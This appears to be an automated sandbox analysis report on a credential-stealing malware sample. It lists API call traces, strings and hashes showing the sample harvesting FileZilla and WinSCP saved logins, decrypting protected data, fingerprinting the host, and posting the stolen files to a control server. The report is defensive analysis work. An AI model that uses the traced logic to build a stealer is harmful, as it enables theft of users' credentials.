                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 0041120B
                                                                                    • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0041121F
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411232
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 186290926-0
                                                                                    • Opcode ID: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                    • Instruction ID: 368edb313bfa2f31f76f5ba6fbd020b911e3fe3703e22c74ac1c99050383bae8
                                                                                    • Opcode Fuzzy Hash: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                    • Instruction Fuzzy Hash: 56015A71900028AFDB119F95DD48ADEBBB9EF86300F204096F505F2220D7788F84CFA5
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                                    • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                                    • wsprintfA.USER32 ref: 0040FCD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 362916592-0
                                                                                    • Opcode ID: 0604e6eb6e2682e20b2124677ba798e9b04fc5edbfebe48aceeb8ffeb4b62a16
                                                                                    • Instruction ID: c4178db3a7b5cadc3d34117ce99b3585a5539fb9734740f51f0b0a417066b3ea
                                                                                    • Opcode Fuzzy Hash: 0604e6eb6e2682e20b2124677ba798e9b04fc5edbfebe48aceeb8ffeb4b62a16
                                                                                    • Instruction Fuzzy Hash: 00E09275700234BBEB1067A8AC0EF87366EAB06725F111262FA15D21D0E6B499048AE5
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                    • LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                    • LocalFree.KERNEL32(?), ref: 004062FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 2068576380-0
                                                                                    • Opcode ID: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                                    • Instruction ID: e950b9794f619c2f14945d92c2c82b9cfbc0e84929ee7baf067997c9d55b3a17
                                                                                    • Opcode Fuzzy Hash: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                                    • Instruction Fuzzy Hash: 38011D7A900218AFDB01EFE8DC849DEBBBDFF48700B10046AFA42E7250D6759950CB50
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
                                                                                    • GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocNameProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 1206570057-0
                                                                                    • Opcode ID: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                                    • Instruction ID: 717baa134c2685402ab052e767e48c87ea90d479ce835390d18d57d128390497
                                                                                    • Opcode Fuzzy Hash: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                                    • Instruction Fuzzy Hash: 90D05EB6700204FBE7109BA5DE0DE9BBBBCEB84755F400166FB02D2290DAF09A05CA34
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2452939696-0
                                                                                    • Opcode ID: cbe062100e03a9cd5bd2a5b056dc4366336c04a80b9081003c6696508956f941
                                                                                    • Instruction ID: cc392225a4cdd4d81fb3b645c3f3a3bcf8ea132c99b34c9dcf4625544169bb0c
                                                                                    • Opcode Fuzzy Hash: cbe062100e03a9cd5bd2a5b056dc4366336c04a80b9081003c6696508956f941
                                                                                    • Instruction Fuzzy Hash: D8D05B75D0011DD7CF10EB90FC49A8977BCAB04308F4001A1D700F2050E375D61D8BD5

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 29 (4043ad-4044ac): node and edge listing omitted; legend: Executed / Not Executed
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004043B2
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                      • Part of subcall function 00410DAC: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                                      • Part of subcall function 00410DAC: GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                                      • Part of subcall function 00410DAC: HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044A4
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00425A98,00000000,?,?,00000000), ref: 00404B42
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404B54
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00404B6D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404B7F
                                                                                    • memcpy.MSVCRT ref: 00404B92
                                                                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
                                                                                    • memcpy.MSVCRT ref: 00404BB3
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404BC4
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
                                                                                    • memcpy.MSVCRT ref: 00404BEA
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
                                                                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
                                                                                    • ExitProcess.KERNEL32 ref: 00404CDC
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404CEC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                    • String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data
                                                                                    • API String ID: 2658035217-3274521816
                                                                                    • Opcode ID: c00282e5cd75c8dd74f6355570a176c63ce9ed19f1804046c84903359e236d60
                                                                                    • Instruction ID: 7da96a8239c4269f2075af8d64b6677d5cc6d7227197695578cb8bd043abdbf5
                                                                                    • Opcode Fuzzy Hash: c00282e5cd75c8dd74f6355570a176c63ce9ed19f1804046c84903359e236d60
                                                                                    • Instruction Fuzzy Hash: 2E624EB190014DEADB11EBE0C956BEEBBB8AF18308F50417AE505735C2DB786B4CCB65

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 357 (40bbe8-40bca7): node and edge listing omitted; legend: Executed / Not Executed
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040BBED
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • strtok_s.MSVCRT ref: 0040BCCB
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00425C9B,00425C9A,00425C97,00425C96), ref: 0040BD1F
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040BD26
                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BD3A
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BD45
                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BD7D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BD88
                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 0040BDC6
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BDD1
                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BE0F
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BE1E
                                                                                    • lstrlenA.KERNEL32(?), ref: 0040C019
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • memset.MSVCRT ref: 0040C06C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                    • API String ID: 486015307-935134978
                                                                                    • Opcode ID: c68a0f27bc902ea05c839ad39b5d4922081ace22d6ea3294da39bef75c792f8c
                                                                                    • Instruction ID: 255c4b719d3f0515adc493bcbacf9bf61407d1e7a5812a7bdcdf9b10872d254a
                                                                                    • Opcode Fuzzy Hash: c68a0f27bc902ea05c839ad39b5d4922081ace22d6ea3294da39bef75c792f8c
                                                                                    • Instruction Fuzzy Hash: DEE18F71900258EADB11EBE1DC56FEEBB78AF19304F50007AF505B21D2EF781A08CB69

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040E7BD
                                                                                    • memset.MSVCRT ref: 0040E7E6
                                                                                    • memset.MSVCRT ref: 0040E806
                                                                                    • memset.MSVCRT ref: 0040E81A
                                                                                    • memset.MSVCRT ref: 0040E82E
                                                                                    • memset.MSVCRT ref: 0040E83D
                                                                                    • memset.MSVCRT ref: 0040E84B
                                                                                    • memset.MSVCRT ref: 0040E85C
                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040E884
                                                                                    • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E8AC
                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040E8F3
                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E910
                                                                                    • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00425C8F), ref: 0040E9A2
                                                                                    • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040E9F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: memset$Value$Open$EnumH_prolog
                                                                                    • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                    • API String ID: 784052110-2798830873
                                                                                    • Opcode ID: 86d90c555041147e3355f381ce4fc8bf561c3cd64d0a3905eecc7d65a5013481
                                                                                    • Instruction ID: 89295896da61250e7cefd1c96a7d7708b6de7757bceb80d1fe37bfb71a37c9ed
                                                                                    • Opcode Fuzzy Hash: 86d90c555041147e3355f381ce4fc8bf561c3cd64d0a3905eecc7d65a5013481
                                                                                    • Instruction Fuzzy Hash: BCF11CB1D0015DAEDB11EBE1CC41FEEBB7CAF18304F5441BBE515B2182DA785A48CB65

                                                                                    Control-flow Graph

                                                                                    [Control-flow graph 877, function range 414604-4153f5; legend: Executed / Not Executed]
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00414609
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FC38: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042654E), ref: 0040FC46
                                                                                      • Part of subcall function 0040FC38: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC4D
                                                                                      • Part of subcall function 0040FC38: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC59
                                                                                      • Part of subcall function 0040FC38: wsprintfA.USER32 ref: 0040FC84
                                                                                      • Part of subcall function 00410415: memset.MSVCRT ref: 0041043B
                                                                                      • Part of subcall function 00410415: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NeB,?,?,00000000), ref: 00410457
                                                                                      • Part of subcall function 00410415: RegQueryValueExA.KERNEL32(NeB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                      • Part of subcall function 00410415: CharToOemA.USER32(?,?), ref: 00410493
                                                                                      • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                                      • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                      • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                      • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                      • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00426600,00000000,?,00000000,00000000,?,HWID: ,00000000,?,004265F4,00000000), ref: 00414922
                                                                                      • Part of subcall function 00411001: OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                      • Part of subcall function 00411001: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                      • Part of subcall function 00411001: CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                      • Part of subcall function 0041064B: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                      • Part of subcall function 0041064B: HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                      • Part of subcall function 0041077C: _EH_prolog.MSVCRT ref: 00410781
                                                                                      • Part of subcall function 0041077C: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                                      • Part of subcall function 0041077C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                                      • Part of subcall function 0041077C: CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?), ref: 004107C4
                                                                                      • Part of subcall function 0041077C: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                                      • Part of subcall function 0041077C: VariantInit.OLEAUT32(?), ref: 00410855
                                                                                      • Part of subcall function 00410925: _EH_prolog.MSVCRT ref: 0041092A
                                                                                      • Part of subcall function 00410925: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?,00000000), ref: 00410942
                                                                                      • Part of subcall function 00410925: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                                      • Part of subcall function 00410925: CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?), ref: 0041096D
                                                                                      • Part of subcall function 00410925: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                                      • Part of subcall function 00410925: VariantInit.OLEAUT32(?), ref: 004109F6
                                                                                      • Part of subcall function 0040FBFD: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000), ref: 0040FC09
                                                                                      • Part of subcall function 0040FBFD: HeapAlloc.KERNEL32(00000000,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FC10
                                                                                      • Part of subcall function 0040FBFD: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FC24
                                                                                      • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
                                                                                      • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
                                                                                      • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                      • Part of subcall function 004103A0: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
                                                                                      • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
                                                                                      • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
                                                                                      • Part of subcall function 004103A0: ReleaseDC.USER32(00000000,00000000), ref: 004103D6
                                                                                      • Part of subcall function 004103A0: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?), ref: 004103E2
                                                                                      • Part of subcall function 004103A0: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?,00000000), ref: 004103E9
                                                                                      • Part of subcall function 004103A0: wsprintfA.USER32 ref: 004103FB
                                                                                      • Part of subcall function 0040FCE5: _EH_prolog.MSVCRT ref: 0040FCEA
                                                                                      • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD1C
                                                                                      • Part of subcall function 0040FCE5: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                                      • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                                      • Part of subcall function 0040FCE5: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                                      • Part of subcall function 0040FCE5: LocalFree.KERNEL32(?), ref: 0040FE03
                                                                                      • Part of subcall function 0040FC92: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                                      • Part of subcall function 0040FC92: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                                      • Part of subcall function 0040FC92: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                                      • Part of subcall function 0040FC92: wsprintfA.USER32 ref: 0040FCD7
                                                                                      • Part of subcall function 0040FE18: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4), ref: 0040FE2C
                                                                                      • Part of subcall function 0040FE18: HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4,00000000,?), ref: 0040FE33
                                                                                      • Part of subcall function 0040FE18: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                                      • Part of subcall function 0040FE18: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                                      • Part of subcall function 0040FEB4: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FF07
